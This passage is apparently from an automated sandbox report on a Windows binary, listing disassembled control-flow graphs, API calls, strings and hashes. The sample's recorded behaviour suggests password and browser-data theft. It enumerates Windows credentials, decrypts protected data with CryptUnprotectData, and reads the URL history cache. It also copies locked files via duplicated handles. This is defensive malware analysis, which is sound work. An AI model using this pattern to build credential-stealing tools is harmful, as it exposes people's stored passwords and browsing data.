445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                              APIs
                              • memset.MSVCRT ref: 004455C2
                              • wcsrchr.MSVCRT ref: 004455DA
                              • memset.MSVCRT ref: 0044570D
                              • memset.MSVCRT ref: 00445725
                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                              • memset.MSVCRT ref: 0044573D
                              • memset.MSVCRT ref: 00445755
                              • memset.MSVCRT ref: 004458CB
                              • memset.MSVCRT ref: 004458E3
                              • memset.MSVCRT ref: 0044596E
                              • memset.MSVCRT ref: 00445A10
                              • memset.MSVCRT ref: 00445A28
                              • memset.MSVCRT ref: 00445AC6
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                              • memset.MSVCRT ref: 00445B52
                              • memset.MSVCRT ref: 00445B6A
                              • memset.MSVCRT ref: 00445C9B
                              • memset.MSVCRT ref: 00445CB3
                              • _wcsicmp.MSVCRT ref: 00445D56
                              • memset.MSVCRT ref: 00445B82
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                              • memset.MSVCRT ref: 00445986
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                              • API String ID: 2151808875-3798722523
                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                              • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                              • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                              • String ID: $/deleteregkey$/savelangfile
                              • API String ID: 2744995895-28296030
                              • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                              • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 484 40bab4-40baba call 4251c4 472->484 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 483 40bb30-40bb3a 474->483 475->472 479 40b9dd-40ba25 call 447280 call 447960 475->479 479->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 479->492 486 40bb3c 483->486 487 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 483->487 484->440 486->487 487->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                              APIs
                              • memset.MSVCRT ref: 0040B71C
                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                              • wcsrchr.MSVCRT ref: 0040B738
                              • memset.MSVCRT ref: 0040B756
                              • memset.MSVCRT ref: 0040B7F5
                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                              • memset.MSVCRT ref: 0040B851
                              • memset.MSVCRT ref: 0040B8CA
                              • memcmp.MSVCRT ref: 0040B9BF
                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                              • memset.MSVCRT ref: 0040BB53
                              • memcpy.MSVCRT ref: 0040BB66
                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                              • String ID: chp$v10
                              • API String ID: 580435826-2783969131
                              • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                              • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 512 40e304-40e30f call 406e8f 511->512 516 40e314-40e316 512->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f ??3@YAXPAX@Z 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                              APIs
                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                              • memset.MSVCRT ref: 0040E380
                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                              • wcschr.MSVCRT ref: 0040E3B8
                              • memcpy.MSVCRT ref: 0040E3EC
                              • memcpy.MSVCRT ref: 0040E407
                              • memcpy.MSVCRT ref: 0040E422
                              • memcpy.MSVCRT ref: 0040E43D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                              • API String ID: 3073804840-2252543386
                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 618 4093e4-4093fb call 4253af * 2 614->618 616 4092bc 615->616 617 4092be-4092e3 memcpy memcmp 615->617 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                              • String ID:
                              • API String ID: 3715365532-3916222277
                              • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                              • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                              • CloseHandle.KERNEL32(?), ref: 0040E148
                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                              • String ID: bhv
                              • API String ID: 327780389-2689659898
                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                              APIs
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                              • API String ID: 2941347001-70141382
                              • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                              • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                              Control-flow Graph

                              APIs
                              • memset.MSVCRT ref: 0040C298
                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                              • wcschr.MSVCRT ref: 0040C324
                              • wcschr.MSVCRT ref: 0040C344
                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                              • GetLastError.KERNEL32 ref: 0040C373
                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                              • String ID: visited:
                              • API String ID: 2470578098-1702587658
                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 722 40e175-40e1a1 call 40695d call 406b90 727 40e1a7-40e1e5 memset 722->727 728 40e299-40e2a8 call 4069a3 722->728 730 40e1e8-40e1f3 call 406e8f 727->730 733 40e1f8-40e1fa 730->733 734 40e270-40e27d call 406b53 733->734 735 40e1fc-40e219 call 40dd50 * 2 733->735 734->730 740 40e283-40e286 734->740 735->734 746 40e21b-40e21d 735->746 743 40e291-40e294 call 40aa04 740->743 744 40e288-40e290 ??3@YAXPAX@Z 740->744 743->728 744->743 746->734 747 40e21f-40e235 call 40742e 746->747 747->734 750 40e237-40e242 call 40aae3 747->750 750->734 753 40e244-40e26b _snwprintf call 40a8d0 750->753 753->734
                              APIs
                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                              • memset.MSVCRT ref: 0040E1BD
                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                              • _snwprintf.MSVCRT ref: 0040E257
                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                              • API String ID: 3883404497-2982631422
                              • Opcode ID: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                              • Opcode Fuzzy Hash: 7a425c56cbbf5b1cc2378a83f6cf72cfb2264681b451cc294af70ec841fe14a3
                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                              • memset.MSVCRT ref: 0040BC75
                              • memset.MSVCRT ref: 0040BC8C
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                              • memcmp.MSVCRT ref: 0040BCD6
                              • memcpy.MSVCRT ref: 0040BD2B
                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                              • String ID:
                              • API String ID: 509814883-3916222277
                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
